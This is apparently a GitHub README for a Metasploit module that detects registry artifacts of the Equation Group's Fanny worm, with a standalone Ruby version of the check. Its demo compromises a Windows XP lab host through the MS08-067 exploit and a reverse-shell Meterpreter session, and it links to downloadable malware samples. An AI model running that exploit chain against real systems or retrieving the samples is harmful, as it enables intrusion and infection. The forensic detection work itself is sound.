Fanny, or DWE for short (DWE = DementiaWheel).
This detection module is based on the post/windows/gather/forensics module duqu_check.rb. Fanny is a worm that infects Windows machines via USB (not through Autorun, or at least not only). In fact, it used exploits that were later found in Stuxnet. It creates some Registry artifacts, and this module is intended to detect those artifacts.
- [x] Windows x86
- [x] Meterpreter
- [x] Shell
- [x] Windows XP Pro (SP3)
- First, git clone `fanny_bmp_check.rb` from https://github.com/loneicewolf/metasploit_fanny_check_module/blob/main/fanny_bmp_check.rb
- Place it into your msf modules folder, usually located at `/root/.msf4/modules/` (important: check the following step before placing it).
- Create the following folders under it, one inside the other: `post/windows/gather/forensics/`, and put `fanny_bmp_check.rb` there.
- Start msfconsole.
- `use exploit/windows/smb/ms08_067_netapi`
- Set RHOST and LHOST.
```
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.122.1:4444
[*] 192.168.122.160:445 - Automatically detecting the target...
[*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.122.160
[*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100
meterpreter > run post/windows/gather/forensics/fanny_bmp_check
[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.
```
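The check the module performs, written out as a standalone Ruby script (an added example, not the module's own code, and not run through Metasploit): it walks the four ECELP4 registry keys listed in the output above, asks a lookup callable whether each exists, and renders the result in the same format the module prints. The key list is taken from the output above; the `windows_key_exists?` helper (which uses Ruby's win32/registry on a Windows host), the hive table and the constructed `SAMPLE_KEYS` snapshot are assumptions. The real module runs inside the framework over a session rather than querying the local registry.

```ruby
# Standalone check for the Fanny.bmp registry artifacts that
# fanny_bmp_check.rb reports. Added example; not the module's own code.

# Registry keys the module output above lists for Fanny.bmp.
FANNY_ARTIFACTS = [
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver',
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2',
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3',
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8',
].freeze

# Split 'HIVE\sub\key' into the hive name and the subkey path.
def split_key(path)
  hive, _, sub = path.partition('\\')
  [hive, sub]
end

# Live lookup for a Windows host (assumed helper): true when the key opens.
# Needs the win32/registry stdlib extension, i.e. MRI Ruby on Windows.
def windows_key_exists?(path)
  require 'win32/registry'
  hive_name, sub = split_key(path)
  hive = { 'HKEY_LOCAL_MACHINE' => Win32::Registry::HKEY_LOCAL_MACHINE,
           'HKEY_CURRENT_USER'  => Win32::Registry::HKEY_CURRENT_USER }.fetch(hive_name)
  hive.open(sub) { true }
rescue Win32::Registry::Error
  false
end

# Core check: `exists` is any callable answering "does this key exist?", so
# the same logic runs against a live host or against a constructed key list.
def check_fanny_artifacts(exists)
  FANNY_ARTIFACTS.select { |key| exists.call(key) }
end

# Render results in the same style as the module output.
def report(host, found)
  lines = ["[*] Searching registry on #{host} for Fanny.bmp artifacts."]
  found.each { |k| lines << "[+] #{host}: #{k} found in registry." }
  lines << "[*] #{host}: #{found.size} result(s) found in registry."
  lines
end

# Constructed sample: a key snapshot from a hypothetical host, standing in
# for a live registry (two of the four artifacts present, one unrelated key).
SAMPLE_KEYS = [
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver',
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2',
  'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\MSG711',
].freeze

def sample_lookup
  ->(key) { SAMPLE_KEYS.include?(key) }
end

if __FILE__ == $0
  # On Windows query the real registry; elsewhere fall back to the sample.
  on_windows = Gem.win_platform?
  lookup = on_windows ? method(:windows_key_exists?) : sample_lookup
  host = on_windows ? ENV.fetch('COMPUTERNAME', 'localhost') : 'SAMPLEHOST'
  puts report(host, check_fanny_artifacts(lookup))
end
```

Run it as `ruby fanny_check.rb`; on a Windows host with Ruby installed it queries HKLM directly, which makes it a quick way to triage a machine without a Metasploit session. A missing key is treated the same as an access error (`false`), so a result of 0 on a box where you lack read access to HKLM\SYSTEM is not evidence of a clean host.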
Options: a SESSION is required (the session to run the check against). There is nothing else to include here.
Specific demo
One thing this could be used for (as with duqu_check) is to check whether a target system that you or your team plan to perform one or more penetration tests on is already infected by any of these. It would probably also make a nice-looking "alert" for malware researchers who run malware in sandboxes and VMs, because an already infected system or VM becomes more "targeted" if it is infected even further.
For example, if a VM is already infected with Duqu, it is probably not optimal to infect it with anything else at all, e.g. by using Metasploit: Duqu, which is fairly well known by now, already makes the VM (or a real OS, which still does happen) more suspect for malware.
So, short story: the less malicious activity (the less "malware") on a system, the less detection risk is present.
I will upload a POC video demonstrating this on Windows 10 x64, sooner or later. There's already an XP POC video located here
"Equation Group Q&A PDF File": explains Fanny (and not only Fanny, but also many others in the "same family" of malware).
If needed, I included malware samples on the same page.
It goes without saying that if you proceed to this page, please exercise caution.
- https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787
- https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/
- https://edwardsnowden.com/wp-content/uploads/2017/06/FOXACID-Server-SOP-Redacted.pdf
- Windows XP Pro SP3 English
Any questions, improvements or issues are welcome, either via mail or at the issues tab/page: william-martens@protonmail.ch
< Footer coming soon >
<Sidebar coming soon>